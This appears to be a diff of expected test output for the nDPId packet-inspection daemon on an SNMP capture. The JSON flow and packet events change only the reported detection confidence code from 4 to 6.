+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597326976979,"flow_last_seen":1597326977413,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":56251,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326863415,"flow_last_seen":1597326863776,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1597326858008,"flow_last_seen":1597326858289,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597326981183,"flow_last_seen":1597326981598,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":661,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1597327647026,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":52435,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327800258,"flow_last_seen":1597327800258,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327800258,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":60694,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1597327800258,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1597327800258,"pkt":"AAAAV4hpAAwpsVpsCABFAABcjYRAAEAR92yDszGl\/p4Bqe0WAKEASKFzMD4CAQMwEQIESC476wIDAP\/jBAEEAgEDBBAwDgQAAgEAAgEABAAEAAQAMBQEAAQAoA4CBFFbpQoCAQACAQAwAA=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327800258,"flow_last_seen":1597327800258,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327800258,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":60694,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327800258,"flow_last_seen":1597327800258,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327800258,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":60694,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1597327800373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1597327800373,"pkt":"AAwpsVpsAAAAV4hpCABFAACFADwAAP8RBYz+ngGpg7MxpQCh7RYAcTFqMGcCAQMwEAIESC476wICBdwEAQACAQMEHTAbBAyAAAAJAwCqu8wAAQACAQwCAgYEBAAEAAQAMDEEDIAAAAkDAKq7zAABAAQAqB8CBFFbpQoCAQACAQAwETAPBgorBgEGAw8BAQQAQQES"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1597327800375,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1597327800375,"pkt":"AAAAV4hpAAwpsVpsCABFAACkjZFAAEAR9xeDszGl\/p4Bqe0WAKEAkIDGMIGFAgEDMBECBEguO+oCAwD\/4wQBBwIBAwQ7MDkEDIAAAAkDAKq7zAABAAIBDAICBgQEClNIQTFBRVMxMjgEDFRZRuSc\/VhrMMFzGAQIOby89G+ocM4EMAJRqrL1y0ddF49kZLmuqEd2Zc5EUOuNk0HcYVl0aShUgcBxMzYymbe4GgHUhuqMnA=="} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327805470,"flow_last_seen":1597327805470,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327805470,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":35970,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1597327805470,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1597327805470,"pkt":"AAAAV4hpAAwpsVpsCABFAABcmE1AAEAR7KODszGl\/p4BqYyCAKEASI48MD4CAQMwEQIETLLWIgIDAP\/jBAEEAgEDBBAwDgQAAgEAAgEABAAEAAQAMBQEAAQAoA4CBG51QB0CAQACAQAwAA=="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327805470,"flow_last_seen":1597327805470,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327805470,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":35970,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327805470,"flow_last_seen":1597327805470,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327805470,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":35970,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1597327805611,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1597327805611,"pkt":"AAwpsVpsAAAAV4hpCABFAACFAD8AAP8RBYn+ngGpg7MxpQChjIIAcR0uMGcCAQMwEAIETLLWIgICBdwEAQACAQMEHTAbBAyAAAAJAwCqu8wAAQACAQwCAgYJBAAEAAQAMDEEDIAAAAkDAKq7zAABAAQAqB8CBG51QB0CAQACAQAwETAPBgorBgEGAw8BAQQAQQET"} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1597327805613,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1597327805613,"pkt":"AAAAV4hpAAwpsVpsCABFAACkmNVAAEAR69ODszGl\/p4BqYyCAKEAkN2JMIGFAgEDMBECBEyy1iECAwD\/4wQBBwIBAwQ7MDkEDIAAAAkDAKq7zAABAAIBDAICBgkEClNIQTFBRVMxMjgEDJtziJHxaodwRs3eIQQIgB4HBiglqmIEMAupq3l+cOYYEzoCHoY5O4X4TJUa2wXJNOK\/b37r1sMKQ+nPnY1s\/d1MAtxa8BQz+g=="} 
00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":53,"source":"snmp.pcap","alias":"nDPId-test","packets-captured":53,"packets-processed":52,"total-skipped-flows":0,"total-l4-payload-len":4998,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":4,"total-updates":0,"current-active-flows":4,"total-active-flows":10,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1597328385284} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"snmp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328385284,"flow_last_seen":1597328385284,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"92.135.15.240","dst_ip":"137.49.110.186","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"snmp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1597328385284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1597328385284,"pkt":"AAwpOSzhAAAASwKNCABFAADJAAAAAP8RVsFchw\/wiTFuutQuAKIAtdeqMIGqAgEBBAhwdWJsaWMyY6eBmgIBFwIBAAIBADCBjjAPBggrBgECAQEDAEMDAz\/FMBcGCisGAQYDAQEEAQAGCSsGAQYDAQEFAzAPBgorBgECAQICAQECAgECMBkGCisGAQIBAgIBAgIEC0V0aGVybmV0MC8xMA8GCisGAQIBAgIBAwICAQYwJQYMKwYBBAEJAgIBARQCBBVhZG1pbmlzdHJhdGl2ZWx5IGRvd24="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"snmp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328385284,"flow_last_seen":1597328385284,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"92.135.15.240","dst_ip":"137.49.110.186","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327800258,"flow_last_seen":1597327800683,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":737,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":60694,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327640387,"flow_last_seen":1597327640799,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":60440,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327646611,"flow_last_seen":1597327647026,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":702,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":49306,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327805470,"flow_last_seen":1597327805899,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":744,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":35970,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"snmp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328385284,"flow_last_seen":1597328385284,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"92.135.15.240","dst_ip":"137.49.110.186","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327800258,"flow_last_seen":1597327800683,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":737,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":60694,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327640387,"flow_last_seen":1597327640799,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":60440,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327646611,"flow_last_seen":1597327647026,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":702,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":49306,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327805470,"flow_last_seen":1597327805899,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":744,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":35970,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
00638{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1597328420435,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1597328420435,"pkt":"AAwpOSzhAAAASwKNCABFAAC1AAEAAP8RVtRchw\/wiTFuutQuAKIAoQR+MIGWAgEBBAhwdWJsaWMyY6eBhgIBHAIBAAIBADB7MA8GCCsGAQIBAQMAQwMDTYAwFwYKKwYBBgMBAQQBAAYJKwYBBgMBAQUEMA8GCisGAQIBAgIBAQICAQIwGQYKKwYBAgECAgECAgQLRXRoZXJuZXQwLzEwDwYKKwYBAgECAgEDAgIBBjASBgwrBgEEAQkCAgEBFAIEAnVw"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"snmp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328648399,"flow_last_seen":1597328648399,"flow_idle_time":200000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1597328648399,"l3_proto":"ip4","src_ip":"200.76.132.137","dst_ip":"189.111.255.214","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"snmp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1597328648399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":188,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":188,"pkt_l4_len":154,"thread_ts_msec":1597328648399,"pkt":"AAwpl\/zFAAAAQogiCABFAACuAAIAAP8RsSDITISJvW\/\/1tQuAKIAmmoKMIGPAgEABAZwdWJsaWOkgYEGCCsGAQYDAQEFQAQKAR4BAgECAgEAQwMDpowwZDAPBgorBgECAQICAQECAgECMBkGCisGAQIBAgIBAgIEC0V0aGVybmV0MC8xMA8GCisGAQIBAgIBAwICAQYwJQYMKwYBBAEJAgIBARQCBBVhZG1pbmlzdHJhdGl2ZWx5IGRvd24="} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"snmp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328648399,"flow_last_seen":1597328648399,"flow_idle_time":200000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1597328648399,"l3_proto":"ip4","src_ip":"200.76.132.137","dst_ip":"189.111.255.214","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"snmp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328648399,"flow_last_seen":1597328648399,"flow_idle_time":200000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1597328648399,"l3_proto":"ip4","src_ip":"200.76.132.137","dst_ip":"189.111.255.214","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snmp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597328385284,"flow_last_seen":1597328420435,"flow_idle_time":200000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1597328648399,"l3_proto":"ip4","src_ip":"92.135.15.240","dst_ip":"137.49.110.186","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"snmp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1597328660640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1597328660640,"pkt":"AAwpl\/zFAAAAQogiCABFAACZAAMAAP8RsTTITISJvW\/\/1tQuAKIAhYZxMHsCAQAEBnB1YmxpY6RuBggrBgEGAwEBBUAECgEeAQIBAwIBAEMDA6tUMFEwDwYKKwYBAgECAgEBAgIBAjAZBgorBgECAQICAQICBAtFdGhlcm5ldDAvMTAPBgorBgECAQICAQMCAgEGMBIGDCsGAQQBCQICAQEUAgQCdXA="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328704045,"flow_last_seen":1597328704045,"flow_idle_time":200000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1597328704045,"l3_proto":"ip4","src_ip":"113.19.156.111","dst_ip":"135.201.124.55","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00769{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1597328704045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1597328704045,"pkt":"AAwpOzE1AAAAQZqWCABFAAEWAAQAAP8RqU9xE5xvh8l8N9QuAKIBAqHIMIH3AgEDMA0CASACAgXcBAEBAgEDBDMwMQQMgAAACQMAqrvMAAEAAgEMAgIJjAQKU0hBMU5PUFJJVgQM1oH0ll47GC4cDzqhBAAwga0EDIAAAAkDAKq7zAABAAQAp4GaAgEnAgEAAgEAMIGOMA8GCCsGAQIBAQMAQwMDvEgwFwYKKwYBBgMBAQQBAAYJKwYBBgMBAQUDMA8GCisGAQIBAgIBAQICAQIwGQYKKwYBAgECAgECAgQLRXRoZXJuZXQwLzEwDwYKKwYBAgECAgEDAgIBBjAlBgwrBgEEAQkCAgEBFAIEFWFkbWluaXN0cmF0aXZlbHkgZG93bg=="} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328704045,"flow_last_seen":1597328704045,"flow_idle_time":200000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1597328704045,"l3_proto":"ip4","src_ip":"113.19.156.111","dst_ip":"135.201.124.55","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328704045,"flow_last_seen":1597328704045,"flow_idle_time":200000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1597328704045,"l3_proto":"ip4","src_ip":"113.19.156.111","dst_ip":"135.201.124.55","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
